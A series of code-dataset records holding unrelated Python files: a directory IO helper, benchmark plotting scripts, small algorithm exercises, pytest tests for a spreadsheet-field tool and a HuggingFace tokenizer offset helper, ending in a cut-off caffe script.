to perform Input/Output opreations.\n\n Provides methods to perform various IO operations\n in the target directory.\n\n Attributes\n ----------\n path: str\n Path to the target directory\n mode: str\n Mode of operations, valid values are\n `a`: IO has all permissions (R/W/X/A)\n `m`: IO has moderate permissions (R/W/A)\n `s`: IO has limited permissions (R/A)\n \"\"\"\n\n def __init__(self, path=os.getcwd(), mode=\"a\", ignore_dirs=[]):\n \"\"\"Initialize the IO class.\n\n Parameters\n ----------\n path: str, optional\n Path to perform operations on\n mode: str, optional\n Mode of operations, valid values are\n `a`: IO has all permissions (R/W/X/A)\n `m`: IO has moderate permissions (R/W/A)\n `s`: IO has limited permissions (R/A)\n ignore_dirs: list\n List of directories to ignore\n \"\"\"\n self._path = str()\n self._mode = str()\n self.ignore_dirs = ignore_dirs\n self.files = []\n self.sub_dirs = []\n\n self.path = path\n self.mode = mode\n\n if not isdir(self.path):\n raise IOError(\n f'{self.path} is not a valid directory'\n )\n\n if self.mode not in ['a', 'm', 's']:\n raise ValueError(\n f'{self.mode} is not a valid IO operation mode'\n )\n\n self.setup()\n\n def setup(self):\n \"\"\"Setup the IO class\n \"\"\"\n self.mode_mappings = {'a': [*'rwxa', 'wb+', 'w+', 'rb+'],\n 'm': [*'rwa', 'wb', 'rb'],\n 's': [*'ra', 'rb']}\n\n self.update_paths(self._path)\n\n def update_paths(self, path):\n \"\"\"Update the 
paths of files, sub_dirs w.r.t the path.\n\n        Parameters\n        ----------\n        path: str\n            Path to the target directory\n        \"\"\"\n        self.files.clear()\n        self.sub_dirs.clear()\n\n        # Record every file and sub-directory that is not under an ignored\n        # directory; files and sub-directories are collected in separate loops\n        # because the two lists rarely have the same length.\n        for root, subdirs, files in os.walk(path):\n            if all(dir not in root for dir in self.ignore_dirs):\n\n                for file in files:\n                    self.files.append(pjoin(root, file))\n                for dir in subdirs:\n                    self.sub_dirs.append(pjoin(root, dir))\n\n    def read(self, file, mode='r'):\n        \"\"\"Read the content of a file\n\n        Parameters\n        ----------\n        file: str\n            Name of the file\n        mode: str, optional\n            Mode of operation\n        \"\"\"\n        if mode not in self.mode_mappings[self.mode]:\n            raise IOError(\n                f'Mode {mode} not allowed with IO mode {self.mode}'\n            )\n\n        with open(file, mode) as f:\n            content = f.read()\n\n        return content\n\n    def write(self, file, mode, content):\n        \"\"\"Write some content into a file.\n\n        Parameters\n        ----------\n        file: str\n            Name of the file\n        mode: str\n            Mode of operation\n        content: str\n            Content to write in the file\n        \"\"\"\n        if mode not in self.mode_mappings[self.mode]:\n            raise IOError(\n                f'Mode {mode} not allowed with IO mode {self.mode}'\n            )\n\n        with open(file, mode) as f:\n            f.write(content)\n\n    @property\n    def path(self):\n        return self._path\n\n    @path.setter\n    def path(self, path):\n        \"\"\"Set the value of the current path.\n\n        Parameters\n        ----------\n        path: str\n            New path\n        \"\"\"\n        self._path = path\n        self.update_paths(self._path)\n\n    @property\n    def mode(self):\n        return self._mode\n\n    @mode.setter\n    def mode(self, mode):\n        \"\"\"Set the value of the IO mode.\n\n        Parameters\n        ----------\n        mode: str\n            Mode of operations, valid values are\n            `a`: IO has all permissions (R/W/X/A)\n            `m`: IO has moderate permissions (R/W/A)\n            `s`: IO has limited permissions (R/A)\n        \"\"\"\n        self._mode = mode\n\n        if self._mode not in [*'ams']:\n            raise ValueError(\n                f'{self._mode} is not a valid IO operation mode'\n            )\n\n    @property\n    def mode_mapping(self):\n        return self.mode_mappings\n\n    @mode_mapping.setter\n    def mode_mapping(self, io_mode):\n        \"\"\"Add an IO permission to a specific mode\n\n        Parameters\n        ----------\n        io_mode: Iterable\n            Iterable that packs the mode, IO permission\n            Valid values are\n            `a`: IO has all permissions (R/W/X/A)\n            `m`: IO has moderate permissions (R/W/A)\n            `s`: IO has limited permissions (R/A)\n        \"\"\"\n        if len(io_mode) != 2:\n            raise ValueError(\n                f'Iterable {io_mode} can have max two values packed'\n            )\n\n        mode, io_permission = io_mode\n        self.mode_mappings[mode].append(io_permission)\n","sub_path":"checkpoint/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"760741","text":"import statistics\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport re\nimport pandas as pd\nimport os\nfrom matplotlib.patches import Patch\n\ndef fileToObject(filename):\n    currentObject = {}\n    for line in open(filename, \"r\"):\n        splittedLine = line.split(' ')\n\n        if not splittedLine[0] in currentObject:\n            currentObject[splittedLine[0]] = []\n\n        currentObject[splittedLine[0]].append(int(splittedLine[2]))\n\n    return currentObject\n\ndef checkresults(results):\n    valid_result_counter = 0\n    invalid_result_counter = 0\n    for xid in results:\n        if len(results[xid]) == 2: valid_result_counter += 1\n        else: invalid_result_counter += 1\n\n    print(str(valid_result_counter) + \" valid results\")\n    print(str(invalid_result_counter) + \" invalid results\")\n\ndef get_results_for_file(filename):\n    results = 
fileToObject(filename)\n    xids = list(results.keys())\n    del xids[:1000]\n    checkresults(results)\n\n    measured_delays = []\n    for xid in xids:\n        if len(results[xid]) == 2:\n            measured_delays.append(abs(results[xid][0] - results[xid][1]))\n\n    mean = statistics.mean(measured_delays)\n    stdev = statistics.stdev(measured_delays)\n    print(\"{} delays in file {}\".format(len(measured_delays), filename))\n    print(\"mean: {} stdev: {}\".format(mean, stdev))\n\n    return mean, stdev\n\ndef get_avg_from_cbench_result(filename):\n    regex = \"^RESULT: \\d switches \\d+ tests min\\/max\\/avg\\/stdev = ([0-9\\.]*)\\/([0-9\\.]*)\\/([0-9\\.]*)\\/([0-9\\.]*) responses\\/s$\"\n\n    with open(filename) as currentFile:\n        lines = currentFile.read()\n    match = re.search(regex, lines, re.MULTILINE)\n    res = [float(match.group(1)), float(match.group(2)), float(match.group(3)), float(match.group(4))]\n    if int(res[2]) == 0: print(\"result from \" + filename + \" is 0!\")\n    return int(res[2])\n\ndef get_pybench_result(filename):\n    delays = []\n    for line in open(filename, \"r\"):\n        splitted = line.split(' ')\n        delays.append(int(splitted[2]) - int(splitted[1]))\n\n    mean = statistics.mean(delays)\n    stdev = statistics.stdev(delays)\n    print(\"{}: mean: {} stdev: {}\".format(filename, mean, stdev))\n    return mean, stdev\n\ndef plot_bar_chart(data, stdev, labels, filename):\n    plt.clf()\n\n    plt.figure(figsize=(4, 3))\n\n    axes = plt.gca()\n    axes.set_ylim([-250, 760])\n    axes.set_ylabel(r'Time in $\\mu s$')\n    axes.set_xlabel('Number of GCMI Apps')\n    axes.yaxis.grid(True)\n\n    y_pos = np.arange(len(labels))\n\n    # Create bars\n    plt.bar(y_pos, data, yerr=stdev, align='center', ecolor='black', capsize=6, width=0.5, hatch=\"//\", fill=False, edgecolor='black')\n\n    # Create names on the x-axis\n    plt.xticks(y_pos, labels)\n\n\n    handles, labels = axes.get_legend_handles_labels()\n    handles.append(plt.errorbar(0, -1000, yerr=10, ecolor=\"black\", fmt='none', elinewidth=1, capsize=4, capthick=1))\n    labels.append(\"Standard Deviation\")\n\n    legend = axes.legend()\n    legend._legend_box = None\n    legend._init_legend_box(handles, labels)\n    legend._set_loc(legend._loc)\n    legend.set_title(legend.get_title().get_text())\n\n\n    plt.savefig(filename, bbox_inches='tight')\n\ndef plot_line_chart_matching_messages(data, labels, filename):\n    plt.clf()\n\n    plt.figure(figsize=(4, 3))\n\n    axes = plt.gca()\n    #axes.set_ylim([30, 250])\n    axes.set_ylabel(r'Processing Time in $\\mu s$')\n    axes.set_xlabel('Matching Messages')\n    axes.yaxis.grid(True)\n\n    line_names = [\"1\", \"2\", \"4\", \"8\", \"16\"]\n\n    y_pos = np.arange(len(labels))\n\n    df = pd.DataFrame({'x': np.arange(len(labels)), line_names[0]: data[0], line_names[1]: data[1],\n                       line_names[2]: data[2], line_names[3]: data[3], line_names[4]: data[4]})\n\n    # Create lines\n    colors = ['darkgreen', 'blue', 'orange', 'purple', 'red']\n    for i, line_name in reversed(list(enumerate(line_names))):\n        plt.plot( 'x', line_name, data=df, marker='.', markerfacecolor=colors[i], markersize=6, color=colors[i], linewidth=1)\n\n    # Create names on the x-axis\n    plt.xticks(y_pos, labels)\n\n    plt.rcParams['legend.title_fontsize'] = '9'\n\n    # Shrink current axis by 20%\n    box = axes.get_position()\n    axes.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n    # Put a legend to the right of the current axis\n    axes.legend(title='Number of\\nGCMI Apps', loc='center left', bbox_to_anchor=(1, 0.5))\n\n    plt.savefig(filename, bbox_inches='tight')\n\ndef plot_line_chart_with_without_tls(data, labels, filename):\n    plt.clf()\n\n    
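# NOTE: 'data' is expected to hold exactly two series, [with TLS, without\n    # TLS], each plotted below as one line over the app counts in 'labels'.\n    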
plt.figure(figsize=(4, 3))\n\n axes = plt.gca()\n axes.set_ylim([0, 175])\n axes.set_ylabel(r'processing time in $\\mu s$')\n axes.set_xlabel('number of apps')\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), 'with TLS': data[0], 'without TLS': data[1]})\n\n # Create lines\n plt.plot( 'x', 'with TLS', data=df, marker='.', markerfacecolor='black', markersize=5, color='blue', linewidth=1)\n plt.plot( 'x', 'without TLS', data=df, marker='.', markerfacecolor='black', markersize=5, color='darkgreen', linewidth=1)\n plt.legend()\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_line_chart_filter_apps(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(3.5, 3.5))\n\n axes = plt.gca()\n #axes.set_ylim([0, 8000])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Number of Filters')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), 'Filters in one GCMI App': data[0], 'Filters in different\\nGCMI Apps': data[1]})\n\n # Create lines\n plt.plot( 'x', 'Filters in one GCMI App', data=df, marker='.', markerfacecolor='darkgreen', markersize=5, color='darkgreen', linewidth=1)\n plt.plot( 'x', 'Filters in different\\nGCMI Apps', data=df, marker='.', markerfacecolor='blue', markersize=5, color='blue', linewidth=1)\n plt.legend()\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_herter_vs_enhanced_bar(data, stdev):\n plt.clf()\n plt.figure(figsize=(5, 4))\n\n colors = [\"#3498db\", \"#95a5a6\", \"#2ecc71\"]\n bar_labels = ['Enhanced Framework\\nwith one Proxy', 'Enhanced Framework\\nwith multiple Proxies', 'Herter\\'s Framework']\n\n barWidth = 0.25\n barPositions = range(len(data[0]))\n\n for i, bars in enumerate(data):\n currentBarPositions = [x + i * barWidth for x in barPositions]\n plt.bar(currentBarPositions, bars, error_kw=dict(lw=1, capsize=4, capthick=1), width=barWidth, color=colors[i], yerr=stdev[i], label=bar_labels[i], ecolor=\"black\")\n\n axes = plt.gca()\n handles, labels = axes.get_legend_handles_labels()\n handles.append(plt.errorbar(0, -1000, yerr=10, ecolor=\"black\", fmt='none', elinewidth=1, capsize=4, capthick=1))\n labels.append(\"Standard Deviation\")\n\n legend = axes.legend()\n legend._legend_box = None\n legend._init_legend_box(handles, labels)\n legend._set_loc(legend._loc)\n legend.set_title(legend.get_title().get_text())\n\n plt.xticks([r + barWidth for r in range(len(data[0]))], [1, 2, 4, 8, 16])\n axes.yaxis.grid(True)\n axes.set_ylim([-150, 3600])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Number of GCMI Apps')\n\n # Show graphic\n plt.savefig(\"enhanced_vs_herter.pdf\", bbox_inches='tight')\n\ndef plot_line_chart_caches_same_messages(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(3.5, 3.5))\n\n axes = plt.gca()\n #axes.set_ylim([0, 2500])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Percentage of cacheable Messages')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), 'With Cache': data[0], 'Without Cache': data[1]})\n\n # Create lines\n plt.plot('x', 'With Cache', data=df, marker='.', markerfacecolor='darkgreen', markersize=5, color='darkgreen',\n linewidth=1)\n plt.plot('x', 'Without Cache', data=df, marker='.', markerfacecolor='blue', markersize=5, color='blue',\n linewidth=1)\n plt.legend()\n\n # Create names on the 
x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_double_line_chart_caches_same_messages(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(4, 4))\n\n axes = plt.gca()\n #axes.set_ylim([0, 2500])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Percentage of cacheable Messages')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), '1000 Filters\\nwith Cache': data[0], '1000 Filters\\nwithout Cache': data[1],\n '4000 Filters\\nwith Cache': data[2], '4000 Filters\\nwithout Cache': data[3],\n '8000 Filters\\nwith Cache': data[4], '8000 Filters\\nwithout Cache': data[5]})\n\n print('1000 without cache on avg: {}'.format(statistics.mean(data[1])))\n print('4000 without cache on avg: {}'.format(statistics.mean(data[3])))\n print('8000 without cache on avg: {}'.format(statistics.mean(data[5])))\n\n # Create lines\n plt.plot('x', '8000 Filters\\nwith Cache', data=df, marker='.', markerfacecolor='#B80028', markersize=5,\n color='#B80028',\n linewidth=1)\n plt.plot('x', '8000 Filters\\nwithout Cache', data=df, marker='.', markerfacecolor='#FF9900', markersize=5, color='#FF9900',\n linewidth=1)\n plt.plot('x', '4000 Filters\\nwith Cache', data=df, marker='.', markerfacecolor='#6A8347', markersize=5,\n color='#6A8347',\n linewidth=1)\n plt.plot('x', '4000 Filters\\nwithout Cache', data=df, marker='.', markerfacecolor='#A6CB45', markersize=5, color='#A6CB45',\n linewidth=1)\n plt.plot('x', '1000 Filters\\nwith Cache', data=df, marker='.', markerfacecolor='#005B9A', markersize=5, color='#005B9A',\n linewidth=1)\n plt.plot('x', '1000 Filters\\nwithout Cache', data=df, marker='.', markerfacecolor='#74C2E1', markersize=5, color='#74C2E1',\n linewidth=1)\n\n box = axes.get_position()\n axes.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n # Put a legend to the right of the current axis\n axes.legend(fontsize='9', loc='center left', bbox_to_anchor=(1, 0.5))\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_throughput_filter(data, labels):\n plt.clf()\n\n plt.figure(figsize=(4.5, 4))\n\n axes = plt.gca()\n #axes.set_ylim([0, 80000])\n axes.set_ylabel('Responses per s')\n axes.set_xlabel('Number of GCMI Apps')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n line_names = ['0%', '20%', '40%', '60%', '80%', '100%']\n\n df = pd.DataFrame({'x': np.arange(len(labels)), line_names[0]: data[0], line_names[1]: data[1],\n line_names[2]: data[2], line_names[3]: data[3], line_names[4]: data[4], line_names[5]: data[5]})\n\n # Create lines\n colors = ['darkgreen', 'blue', 'orange', 'purple', 'red', 'pink']\n for i, line_name in enumerate(line_names):\n plt.plot('x', line_name, data=df, marker='.', markerfacecolor=colors[i], markersize=5, color=colors[i], linewidth=1)\n\n # Shrink current axis by 20%\n box = axes.get_position()\n axes.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n # Put a legend to the right of the current axis\n axes.legend(title='matching\\nmessages', fontsize = '9', loc='center left', bbox_to_anchor=(1, 0.5))\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig('scenario_t3_result.pdf', bbox_inches='tight')\n\nif __name__ == \"__main__\":\n args = sys.argv[2:]\n mode = sys.argv[1:][0]\n\n if mode == \"apps\":\n directory = args[0]\n\n mean_data_points = []\n stdev_data_points = []\n labels = []\n\n for number_of_apps in [1, 2, 4, 8, 16]:\n mean, 
stdev = get_results_for_file(directory + \"/proxy_times_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n stdev_data_points.append(stdev)\n labels.append(str(number_of_apps))\n\n plot_bar_chart(mean_data_points, stdev_data_points, labels, \"scenario_d4_result.pdf\")\n\n elif mode == \"matching_messages\":\n directory = args[0]\n numbers_of_apps = [1, 2, 4, 8, 16]\n matching_ratios = [0, 20, 40, 60, 80, 100]\n labels = []\n mean_data_lines = []\n\n for matching_ratio in matching_ratios:\n labels.append(str(matching_ratio) + \"%\")\n\n for number_of_apps in numbers_of_apps:\n mean_data_points = []\n for matching_ratio in matching_ratios:\n mean, stdev = get_results_for_file(\n directory + \"/{}_percent_matching/proxy_times_{}.txt\".format(matching_ratio, number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_line_chart_matching_messages(mean_data_lines, labels, 'plot_matching.pdf')\n\n elif mode == \"with_without_tls\":\n directory = args[0]\n\n mean_data_lines = []\n labels = [1, 2, 4, 8, 16]\n\n for subdirectory in [directory + '/with_tls', directory + '/without_tls']:\n mean_data_points = []\n for number_of_apps in labels:\n mean, stdev = get_results_for_file(subdirectory + \"/proxy_times_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_line_chart_with_without_tls(mean_data_lines, labels, 'plot_tls.pdf')\n\n elif mode == \"filter_in_one_multiple_apps\":\n labels = [1000, 2000, 4000, 8000, 16000]\n mean_data_lines = []\n\n for directory in args:\n mean_data_points = []\n for number_of_apps in [1, 2, 4, 8, 16]:\n mean, stdev = get_results_for_file(directory + \"/proxy_times_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_line_chart_filter_apps(mean_data_lines, labels, 'plot_filter_apps.pdf')\n\n elif mode == \"filter_caches_same_messages\":\n mean_data_lines = []\n labels = [0, 20, 40, 60, 80, 100]\n\n for directory in args:\n mean_data_points = []\n for number_of_apps in labels:\n mean, stdev = get_results_for_file(directory + \"/proxy_times_cache_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_double_line_chart_caches_same_messages(mean_data_lines, labels, 'plot_no_vs_hashmap_cache.pdf')\n\n elif mode == \"throughput_filter\":\n labels = [1, 2, 4, 8, 16]\n data_lines = []\n directory = args[0]\n\n subfolder_names = []\n for matching_messages in [0, 20, 40, 60, 80, 100]:\n subfolder_names.append('/{}_percent_matching'.format(matching_messages))\n\n filenames = []\n for number_of_apps in [1, 2, 4, 8, 16]:\n filenames.append('cbench_throughput_{}.log'.format(number_of_apps))\n\n for subfolder_name in subfolder_names:\n data_line = []\n for filename in filenames:\n data_line.append(get_avg_from_cbench_result(directory + subfolder_name + \"/\" + filename))\n data_lines.append(data_line)\n\n plot_throughput_filter(data_lines, labels)\n\n elif mode == \"herter\":\n labels = [1, 2, 4, 8, 16]\n directory = args[0]\n data_lines = []\n data_lines_stdev = []\n\n for mode in [\"enhanced_services\", \"enhanced_proxychain\", \"herter\"]:\n data_line = []\n data_line_stdev = []\n for label in labels:\n mean, stdev = get_pybench_result(directory + \"/cbench_times_{}_{}.txt\".format(mode, label))\n data_line.append(mean)\n data_line_stdev.append(stdev)\n\n data_lines.append(data_line)\n data_lines_stdev.append(data_line_stdev)\n\n 
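# NOTE: data_lines/data_lines_stdev hold one row of means/stdevs per\n        # framework variant (enhanced_services, enhanced_proxychain, herter);\n        # the call below renders them as grouped bars with error bars.\n        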
plot_herter_vs_enhanced_bar(data_lines, data_lines_stdev)\n","sub_path":"experiments/scenario_t3/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":16226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38991022","text":"# 988 Подпоследовательности\nn = int(input())\nmass = [int(i) for i in input().split()]\nd = [1] * n\n\nfor i in range(n):\n\n\tfor j in range(i):\n\t\tif mass[j] < mass[i]:\n\t\t\td[i] = max(d[i], d[j] + 1)\n\n\nprint(max(d))\n","sub_path":"1-999/988.py","file_name":"988.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55980138","text":"import wranglertools.get_field_info as gfi\nimport pytest\n\n# test data is in conftest.py\n\n\ndef test_get_field_type():\n field1 = {'type': 'string'}\n assert gfi.get_field_type(field1) == 'string'\n\n field2 = {'type': 'number'}\n assert gfi.get_field_type(field2) == 'number'\n\n\ndef test_is_subobject():\n field = {'items': {'type': 'object'}}\n assert gfi.is_subobject(field)\n\n\ndef test_is_not_subobject_wrong_type():\n field = {'items': {'type': 'string'}}\n assert not gfi.is_subobject(field)\n\n\ndef test_is_not_subobject_invalid_data():\n field = {'items': 'ugly'}\n assert not gfi.is_subobject(field)\n\n\ndef test_dotted_field_name():\n assert \"parent.child\" == gfi.dotted_field_name(\"child\", \"parent\")\n\n\ndef test_dotted_field_name_no_parent():\n assert \"child\" == gfi.dotted_field_name(\"child\")\n\n\ndef test_build_field_list(item_properties):\n field_list = gfi.build_field_list(item_properties, required_fields=[\"title\", \"pi\"])\n assert field_list\n assert len(field_list) == 13\n names = [i.name for i in field_list]\n assert '*title' in names\n\n\ndef test_build_field_list_gets_enum(item_properties):\n field_list = gfi.build_field_list(item_properties, include_enums=True)\n for field in field_list:\n if field.name == \"project\":\n assert ['4DN', 'External'] == field.enum\n\n field_list = gfi.build_field_list(item_properties)\n for field in field_list:\n if field.name == \"project\":\n assert not field.enum\n\n\ndef test_build_field_list_gets_desc(item_properties):\n field_list = gfi.build_field_list(item_properties, include_description=True)\n for field in field_list:\n if field.name == \"name\":\n assert \"official grant\" in field.desc\n\n field_list = gfi.build_field_list(item_properties)\n for field in field_list:\n if field.name == \"name\":\n assert len(field.comm) == 0\n\n\ndef test_build_field_list_gets_comments(item_properties):\n field_list = gfi.build_field_list(item_properties, include_comment=True)\n for field in field_list:\n if field.name == \"end_date\":\n assert len(field.comm) >= 1\n\n field_list = gfi.build_field_list(item_properties)\n for field in field_list:\n if field.name == \"end_date\":\n assert len(field.comm) == 0\n\n\ndef test_build_field_list_skips_calculated_properties(calc_properties):\n field_list = gfi.build_field_list(calc_properties)\n assert 1 == len(field_list)\n assert field_list[0].name == 'description'\n\n\ndef test_build_field_list_embeds_with_dots(embed_properties):\n field_list = gfi.build_field_list(embed_properties)\n assert 2 == len(field_list)\n assert field_list[0].name.startswith('experiment_relation')\n assert \"array of embedded objects\" in field_list[0].ftype\n assert field_list[1].name.startswith('experiment_relation')\n\n\ndef test_get_uploadable_fields_mock(connection, 
mocker, returned_vendor_schema):\n    with mocker.patch('wranglertools.fdnDCIC.requests.get', return_value=returned_vendor_schema):\n        field_dict = gfi.get_uploadable_fields(connection, ['Vendor'])\n    for field in field_dict['Vendor']:\n        assert field.name is not None\n        assert field.ftype is not None\n        assert field.desc is not None\n        assert field.comm is not None\n        assert field.enum is not None\n\n\ndef xls_to_list(xls_file, sheet):\n    \"\"\"To compare xls files to reference ones, return a sorted list of content.\"\"\"\n    from operator import itemgetter\n    import xlrd\n    return_list = []\n    wb = xlrd.open_workbook(xls_file)\n    read_sheet = wb.sheet_by_name(sheet)\n    cols = read_sheet.ncols\n    rows = read_sheet.nrows\n    for row_idx in range(rows):\n        row_val = []\n        for col_idx in range(cols):\n            cell_value = str(read_sheet.cell(row_idx, col_idx))\n\n            row_val.append(cell_value)\n        return_list.append(row_val)\n    # list.sort() sorts in place and returns None, so sort first, then return\n    # the sorted list itself.\n    return_list.sort(key=itemgetter(1))\n    return return_list\n\n\n@pytest.mark.file_operation\ndef test_create_xls_vendor(connection, mocker, returned_vendor_schema):\n    xls_file = \"./tests/data_files/GFI_test_vendor.xls\"\n    xls_ref_file = \"./tests/data_files/GFI_test_vendor_reference.xls\"\n    import os\n    try:\n        os.remove(xls_file)\n    except OSError:\n        pass\n    with mocker.patch('wranglertools.fdnDCIC.requests.get', return_value=returned_vendor_schema):\n        field_dict = gfi.get_uploadable_fields(connection, ['Vendor'])\n        gfi.create_xls(field_dict, xls_file)\n    assert os.path.isfile(xls_file)\n    assert xls_to_list(xls_file, \"Vendor\") == xls_to_list(xls_ref_file, \"Vendor\")\n    try:\n        os.remove(xls_file)\n    except OSError:\n        pass\n\n\n@pytest.mark.file_operation\ndef test_create_xls_experiment_set(connection, mocker, returned_experiment_set_schema):\n    xls_file = \"./tests/data_files/GFI_test_Experiment_Set.xls\"\n    xls_ref_file = \"./tests/data_files/GFI_test_Experiment_Set_reference.xls\"\n    import os\n    try:\n        os.remove(xls_file)\n    except OSError:\n        pass\n    with mocker.patch('wranglertools.fdnDCIC.requests.get', return_value=returned_experiment_set_schema):\n        field_dict = gfi.get_uploadable_fields(connection, ['ExperimentSet'], True, True, True)\n        gfi.create_xls(field_dict, xls_file)\n    assert os.path.isfile(xls_file)\n    assert xls_to_list(xls_file, \"ExperimentSet\") == xls_to_list(xls_ref_file, \"ExperimentSet\")\n    try:\n        os.remove(xls_file)\n    except OSError:\n        pass\n","sub_path":"tests/test_get_field_info.py","file_name":"test_get_field_info.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"644524434","text":"def prime(n):\n    # Trial division: x stays 1 only if no divisor of n is found.\n    x=1\n    for i in range(2,n):\n        if n%i==0:\n            x=0\n            break\n        else:\n            x=1\n\n    return x\nnum=int(input(\"how many primes do you want\"))\ni=2\nc=1\nwhile True:\n    if prime(i):\n        print(i)\n        c+=1\n    i+=1\n    if c>num:\n        break\n","sub_path":"Primecheck.py","file_name":"Primecheck.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"140353173","text":"import re\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef huggingface_tokenize(docs, tokenizer, with_tqdm=False, with_token_spans=True, doc_id_col=\"doc_id\", text_col=\"text\", **kwargs):\n    doc_ids = []\n    tokens = []\n    begins = []\n    ends = []\n    token_idx = []\n\n    if with_token_spans:\n        special_tokens = [t for token in tokenizer.special_tokens_map.values() for t in ((token,) if isinstance(token, str) else token)]\n        special_tokens += [\"▁\", \"##\", \"\"]\n        
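# NOTE: these marker strings (\"▁\" for SentencePiece, \"##\" for WordPiece)\n        # are stripped from each piece below so that the remaining characters\n        # can be matched against the raw text to recover character offsets.\n        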
for doc_id, text in tqdm(zip(docs[doc_id_col], docs[text_col]), disable=not with_tqdm, total=len(docs), leave=False, desc=\"Tokenizing\"):\n i = 0\n token_id = 0\n\n sentence_pieces = tokenizer.tokenize(text)\n tokenizer_output = tokenizer.encode_plus(tokenizer.convert_tokens_to_ids(sentence_pieces), return_special_tokens_mask=True, **kwargs)\n encoded_pieces = tokenizer.convert_ids_to_tokens(tokenizer_output[\"input_ids\"])\n pieces = np.asarray(encoded_pieces)\n pieces[~np.asarray(tokenizer_output[\"special_tokens_mask\"], dtype=bool)] = sentence_pieces\n for piece, encoded_piece in zip(pieces, encoded_pieces):\n doc_ids.append(doc_id)\n tokens.append(encoded_piece)\n striped_piece = piece\n for special in special_tokens:\n striped_piece = striped_piece.replace(special, \"\")\n piece_size = len(striped_piece)\n delta = len(re.search(r\"^\\s*\", text[i:]).group(0))\n if striped_piece != text[i+delta:i+delta + piece_size]:\n raise Exception(f\"During processing of doc {doc_id}, wordpiece tokenizer replaced {repr(text[i+delta:i+delta + piece_size])} (in {repr(text[i:i+delta + piece_size + 5])}) \"\n f\"with {repr(striped_piece)} (or multiple pieces). \"\n f\"You must perform substitutions before to ensure that this does not happen, otherwise wordpieces characters cannot be computed.\")\n i += delta\n begins.append(i)\n i += piece_size\n ends.append(i)\n token_idx.append(token_id)\n token_id += 1\n tokens = pd.DataFrame({doc_id_col: doc_ids, \"token_id\": range(len(token_idx)), \"token_idx\": token_idx, \"token\": tokens, \"begin\": begins, \"end\": ends})\n else:\n for doc_id, text in tqdm(zip(docs[doc_id_col], docs[text_col]), disable=not with_tqdm, total=len(docs), leave=False, desc=\"Tokenizing\"):\n token_id = 0\n for encoded_piece in tokenizer.convert_ids_to_tokens(tokenizer.encode(text, **kwargs)):\n doc_ids.append(doc_id)\n tokens.append(encoded_piece)\n token_idx.append(token_id)\n token_id += 1\n tokens = pd.DataFrame({doc_id_col: doc_ids, \"token_id\": range(len(token_idx)), \"token_idx\": token_idx, \"token\": tokens})\n\n voc = tokenizer.convert_ids_to_tokens(list(range(tokenizer.vocab_size)))\n counts = {}\n for i, token in enumerate(list(voc)):\n counts[token] = counts.get(token, 0) + 1\n if counts[token] > 1:\n voc[i] = token + \"-{}\".format(i)\n token_voc = pd.CategoricalDtype(voc)\n tokens = tokens.astype({doc_id_col: docs[doc_id_col].dtype, \"token\": token_voc})\n tokens = tokens.merge(docs[[doc_id_col] + [col for col in docs.columns if col not in tokens.columns and col != \"text\"]])\n return tokens\n","sub_path":"nlstruct/chunking/huggingface_tokenizer.py","file_name":"huggingface_tokenizer.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590588436","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom pprint import pprint\nfrom numpy.random import choice\nfrom scipy.spatial.distance import cdist\n\n# Make sure that caffe is on the python path:\ncaffe_root = '../../caffe/' # this file is expected to be in {caffe_root}/examples\nimport sys\nsys.path.insert(0, caffe_root + 'python')\n\nimport caffe\n\ntest_listfile = '/scratch/16824/data/testlist_class.txt'\nresult_file = 